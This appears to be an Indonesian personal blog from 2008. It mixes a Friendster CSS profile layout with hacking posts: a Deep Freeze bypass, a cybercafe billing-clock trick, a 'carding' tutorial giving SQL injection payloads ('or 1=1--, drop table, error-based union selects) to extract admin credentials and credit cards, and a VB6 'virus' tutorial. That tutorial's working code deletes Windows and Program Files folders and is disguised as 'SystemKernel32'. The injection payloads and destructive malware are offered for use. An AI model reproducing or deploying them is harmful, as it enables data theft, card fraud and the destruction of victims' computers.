06 July 2008

eeeeee

/* {--friendster-layouts.com css code start--} */

/* FRIENDSTER-LAYOUTS.COM */
/* breakdown By Prettyinpinkdolls.net!*/

/* PAGE BACKGROUND */
body {
background-image: url(http://i236.photobucket.com/albums/ff100/fs-layouts2/fslybg/2007/10/breakdown.jpg);
background-attachment: fixed;
background-position: bottom left;
background-repeat: no-repeat;
background-color: #000000;
}
/* GLOBAL FONTS */
.usercontent {
color: #FFFFFF;
}
/* GLOBAL LINKS */
.usercontent a, .usercontent a:link, .usercontent a:visited, .usercontent a:hover, .usercontent a:active {
color: #FFFFFF;
}
.usercontent a:hover {
color: #FFFFFF;
}
/* MASTER BOXES */
.commonbox {
background-color: transparent;
}
.commonbox .evenrow {
background-color: transparent;
}
/* MASTER HEADERS */
.commonbox h1, .commonbox h2 {
color: 000000;
background-color: #FFFFFF;
}
/* CONTROL PANEL: BOX */
.controlpanel {
background-color: transparent;
}
/* CONTROL PANEL: USER PHOTO */
.controlpanel .imgblock200 {
border-color: #FFFFFF;
border-style: dashed;
}
/* CONTROL PANEL: DATA */
.controlpanel .q {
color: #FFFFFF;
}
.controlpanel .data {
color: #FFFFFF;
}
.data a {
color: #FFFFFF;
text-decoration: ;
}
/* CONTROL PANEL: MORE ABOUT ME LINK */
a.more {
color: #FFFFFF;
text-decoration: ;
}
/* CONTROL PANEL: BUTTONS */
#controlPanelButtons a, #controlPanelButtons a:link, #controlPanelButtons a:visited {
font-family: Arial, Sans-serif;
color: 000000;
border-color: 000000;
background-color: #FFFFFF;
text-decoration: ;
}
#controlPanelButtons a:hover {
font-family: Arial, Sans-serif;
color: 000000;
border-color: 000000;
background-color: #FFFFFF;
text-decoration: ;
}
/* BOX: MORE ABOUT ME */
.moreabout {
background-color: transparent;
}
/* BOX: MY PHOTO GALLERY */
.photos {
background-color: transparent;
}
/* BOX: MY FRIENDS */
.friends {
background-color: transparent;
}
/* BOX: MY VIDEOS */
.videos {
background-color: transparent;
}
/* BOX: MY GROUPS */
.groups {
background-color: transparent;
}
/* TESTIMONIAL COMMENTS */
.testimonialscomments {
background-color: transparent;
}
/* BOX: MY SCRAPBOOK */
.scrapbook {
background-color: transparent;
}
/* BOX: FAN OF */
.fanof {
background-color: transparent;
}
/* BOX: MY FANS */
.myfans {
background-color: transparent;
}
/* BOX: MY REVIEWS */
.reviews {
background-color: transparent;
}
/* BOX: MY BLOGS */
.blogs {
background-color: transparent;
}
/* BOX: MY BLOG REVIEWS */
.blogsreviews {
background-color: transparent;
}
/* MISC: TESTIMONIALS/REVIEWS TEXT */
.data {
font-family: Arial, Sans-serif;
color: #FFFFFF;
text-transform: ;
}
/* MISC: VIEW ALL LINKS */
.commonbox .viewall {
color: #FFFFFF;
}
/* MISC: SMALL PHOTOS */
.commonbox .imgblock75, .ir {
border-width: 1px;
border-color: #FFFFFF;
border-style: dashed;
background-color: transparent;
}
/* MISC: SMALL PHOTO NAMES */
.commonbox .dr {
color: #FFFFFF;
background-color: transparent;
}

/* {--friendster-layouts.com css code end--} */

01 July 2008

Jebol...lagi.....!!

Menjebol Deep Freeze 5
Tempat Publik seperti warnet biasanya diproteksi oleh program automatic-recovery seperti Deep Freeze. Hal ini tentunya sangat membantu bagi Administrator Warnet, karena tidak perlu pusing memikirkan soal Virus,Trojan,KeyLog,Spyware dan sebagainya. Setiap kali PC di restart maka semua data akan hilang dan kembali ke settingan awal.
Namun tampaknya Deep Freeze tidak luput dari serangan para Hacker. Terutama Deep Freeze versi 5 dan dibawahnya. Di Internet sudah banyak tersebar Tools bernama UnDeep Freeze yang dapat menon-aktifkan Deep Freeze meskipun kita tidak mengetahui passwordnya. Saat artikel ini ditulis memang sudah sangat basi kedengerannya tapi believe or not ternyata masih banyak Warnet yang tidak menyadari kelemahan dari Deep Freeze 5 dan kebawah.
Akhirnya para iseng mania (kalo tidak layak disebut Hacker) seperti saya , dan juga banyak orang lain diluar sana, dapat dengan mudah melumpuhkan Deep Freeze, dan bahkan menyebarkan virus buatan sendiri (ingat membuat Virus kian mudahnya).
Untuk itu bagi para penyedia layanan publik seperti warnet atau Laboratorium kampus, harap lebih aware terhadap hal yang seperti ini.Bila anda tidak percaya, anda dapat langsung mendownload Tools UnDeep Freeze 1.6 .
Bahkan untuk Deep Freeze 6 sudah ada yang berhasil menjebolnya juga, meski dengan cara yang sedikit lebih repot. Pada posting selanjutnya akan saya bahas.
Keep Secure !

credit card cracking......!! becanda.....koq..!!

Credit cart cracking….he….
hm...!!Sebelum nya maaf kan penulis kalau judul nya cenderung untuk berniat jahat.tapi jangan salah...!!justru setelah membaca tulisan yang singkat ini mampu membuat para perusahaan memiliki security yang benar-benar bisa di andalkan nach...!!kita mulai untuk mengetahui aksi-aksi para carder.sebenar nya tak perlu mempunyai banyak ilmu mengenai IT(Internet Technology)cukup sering browsing/surfing.berikut akan saya ulas sedikit aksi dari para carder.
SQL(Simple Query Laguage)tau gak apa SQL ini?kalo lom tau nach...cari tau dulu dech.
untuk mencari perusahaan yang ingin kita kuras database/isi-isi dan termasuk kartu kredit para pelanggan nya.Caranya:gunakan search engine.yang saat ini paling populer yaitu GOOGLE.ketikan nama perusahaan yang akan di tuju.contoh nya:http//:www.bankbri.co.id.maka tambahkan di akhirnya kata-kata ADMIN/ASP Aatau PHP.
EH TAU GAK??HTTP-WWW-PHP-ASP???DUH..GIMANA MO JADI HACKER KALO KEPANJANGAN ITU AJA GAK TAU.ININIH KEPANJANGAN NYA.ARTINYA CARI SENDIRI...
HTTP=HYPER TEXT TRANSPER PROTOCOL
WWW=WORD WIDE WEB
PHP=HYPER TEXT PREPROCESSOR
ASP=ACTIVE SERVER PAGE
Naah...!!kalo udah tau kepanjangan nya.khan enak...!! kita lanjut pembahasan kita kali ini.tadi kan dah di contoh kan bankmandiri.co.id yang akan di kuras.ketikkan di ujung nya tambahan admin.asp ato php.maka secara otomatis akan dipinta username dan password nya.
naah..tugas kita adalah mencari username dan pasword nya.gimana caranya bang??kita pura-pura tau aja dengan memasukkan dibagian username+password.eeh sebelum nya.tau gak???kalo pesan error itu memberi arahan untuk mencari username nya.nah...gini cara-caranya.ada lima caranya ketikkan dibagian username:
1. '; drop table user--(-;=dinamakan: single line comment,gunanya apa?gunanya agar tidak terjadi error pada saat dijalankan
2. pada bagian username: admin'--
3. ------------^^------------------: 'or 1=1-
4. ------------^^------------------: 'union select 1, 'fictional_user' . 'some_password' . 1--
5. atau dengan sengaja mengisi bidang username salah untuk mendapat kan pesan error yang ditampilkan(error message)gunanya melacak dari pesan tadi.jangan salah lho.....pesan error ternyata ada fungsinya. ketikkan saja: 'having 1=1- -
maka pesan yang akan muncul sebagai berikut:
[Microsoft ODBC SQL SERVER DRIVE] [SQL SERVER] colomn 'USER.id is invalid in the select list because it not contained in an aggregate function and there is no group by clause/ proces_login.asp,line 35
nah....!! sekarang kita tau.kalau pesan error nya bilang begitu berarti dia pake 'user.id.maka kembali ketikkan ulang di username: 'grup by user.id having 1=1- -
maka otomatis akan muncul pesan error lagi sama seperti di atas cuma ada perubahan pada bagian stelah colomn ='user.username'
naaah..!!kita dapat lagi.maka kita susul lagi dengan mengisikan pada username,sekali ini kita cek password nya.dia pake password ato gak.
ketikkan di username: 'group by user.id, user.username.password,user.privs having 1=1- -
jika memungkin kan tidak terjadi error maka tabel user mamang bener ada password nya.maka kita coba lagi isi di bidang username: 'union select sum(username)from user- -
tau gak?? sum=yang terdapat angka metematis/integer.seperti 1234 sampe 9.jika error berarti username brtype varchar.apalagi tuh varchar bang??varchar=huruf yang tidak memiliki nilai matematis.dari A ampe Z.lah..kalo bener dia pake varchar maka akan muncul pesan error. koq errror terus seeh??karna emang kita khan mencari username+passwrd dari pesan error nah...!!!kita lanjut.sekarang pesan error nya begini:
MICROSOFT OLE DB Provider for ODBC driver error'8004e07'
[MICROSOFT] [ODBC SQL SERVER DRIVER] [SQL SERVER]
The sum or average aggregate operation cannot take a varchar data type as an argument
/process_login.asp,line 35
maka kita isi lagi: 'unio select
pesan error nya kurang lebih berbunyi:
@@version,1,1,1- -
Microsoft OLEDB,PROVIDER FOR ODBC DRIVER ERROR ' 8004E07 ' [MICROSOFT] [ODBC SQL Server Driver] [SQL Server]
syntax error convertingthe nvachar value
' microsoft SQL Server 2000-8.00.194(intelx86)aug 6 2000 00:57:48 Copy right (c)1988-2000 microsoft corporation enterprice edition on windows NT 5.0(build 2195:server pack 2) to 2 column of data type int.
/process_login.asp,line 35
nah....!! selanjut nya atas perintah pesan tadi kita mengkonversi konstanta @@version kedalam bentuk integer
username: 'union select min(username),1,1,1 from user where username> 'a' - -
maka akan muncul error message:
microsoft OLE DB provider for ODBC dRIVER ERROR '8840e07'
[microsoft] [odbc sql server driver] [sql server]syntax error converting the varchar value 'ADMIN' to a column of data type int.
/process_login.asp,line 35
nah....!! ada account admin.maka tugas kita gali lagee...
username: 'union select min(username),1,1,1 from user where username> ' admin ' - -
maka akan muncul pesan error
microsoft OLE DB Provider for ODBC driver error ' 80040e07'
[microsoft] [ODBCSQL SERVER DRIVER] syntax error converting the varchar value ' roger ' to a column of data type int.
/process_login.asp,line 35
oke.....!!sekarang kita dapet username dengan nama : roger sekarang kita cari password nya,untuk pengguna roger :
username= ' union select password,1,1,1from user where username= ' admin ' - - maka akan muncul pesan error.yang berbunyi........misal:
microsoft OLEDB Provider for ODBC driver error '8004e07'
[microsoft] [ODBC SQL SERVER DRIVER] syntax error converting the varchar value ' bryan 200' to a column of data type
/process_login.asp,line 35
DAPAT......!!! KALAU UDAH BEGINI MAU APA LAGI?? TERSERAH LOE DECH...mau ngapain aja loe suka-suka ati kau lah.mau di acak-acak tuch database nya.tapi...jangan lupa.berhubung judul kita kali ini CARDING(PEMBOBOL KARTU KREDIT)Nah...musti kartu kredit pelanggan yang di cari.....
nah...untuk kali ini udah dulu dech....ampe sini aja doeloe.eiiit...tapi masih ada lagi yang harus kamu ketahui.yaitu setelah dapet kartu kredit kira-kira tuch kartu masih valid gak ya???jangan-jangan tuch kartu dah abis masa berlakunya cemen dech jadinya....hehehe.jadi gimana caranya bang??cara menguji validitas kartu kredit bisa dibaca di: lanjutan carding/pembobol kartu kredit.nahh..kalo udah dapet tuh kartu kredit yang asli...jangan coba-coba asal maen beli.sembunyikan identitas doeloe..caranya bang???pokok nya baca aja di judul itu dech....dijamin gak nyessel.
selamat mencoba

Iseng – Iseng berhadiah…..


Karena kesal dengan proses pengiriman attachment/file ke imel yang dituju memakan waktu yang lama, iseng-iseng saya menjahili aplikasi billing di warnet depan rumah. Setelah diamati, perhitungan billing explorer atau sewa komputer yang dipakai di warnet depan rumah saya berdasarkan jam yang ada pada komputer client, maka saya mencoba memundurkan jam yang ada di pojok bawah. Start menyewa komputer jam 20:41:20 dengan durasi sewa 00:50:44, saya coba memundurkan waktu 5 menit, dan hasilnya, durasi pemakaian berubah menjadi 00:45:44 :) lumayan, hemat 5 menit. Heheeheh... Tapi nggak ding... saya tidak tega mencurangi billingnya, saya kembalikan lagi durasinya seperti semula. :) Daripada dosa :D

Aplikasi Billing ini rupanya "menyerahkan" sepenuhnya perhitungan durasi sewa komputer kepada waktu yang tertera di pojok bawah desktop, bukan jam yang ada di operator, sehingga "kebocoran" aplikasi ini bisa disalahgunakan. Solusinya? hmmm... mungkin aplikasi billing nya bisa diperbaiki dengan cara, pada saat login user, otomatis perhitungan waktu mengambil "referensi" waktu dari server atau komputer operator. Atau mungkin juga, setiap komputer client diberi "pengaman" agar user tidak bisa membuka atau memodifikasi "fasilitas-fasilitas penting" yang akhirnya membuat operator rugi.

Atau ada solusi lain?

24 June 2008

Nich...Virus....

Gregetan…..!!
Jangan disiasiain yach…..!!
Nih tutorial buat bikin virus yg rada mematikan, tapi simple, dan kayanya sih g’ bakal kedekteksi antivirus, soalnya cara kerjanya simple gt
Yg diperluin:
1. VB(optimal : 6.0)
2. Ngerti tombol2nya VB
—- more —-
Tutorial Bikin Virus cman 1 mnt
1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode
Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3. Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu…
Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…
4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32″ jadi ga bakal dicurigain
5. Jangan pernah naroh nama lu di nih virus… k?
6. compile deh… slese!
Simple kan? nih virus kerjanya cman ngapus system, lumayan bahaya… ini cman contoh bikin virus… slanjutnya.. anda ndiri coba2 ndiri.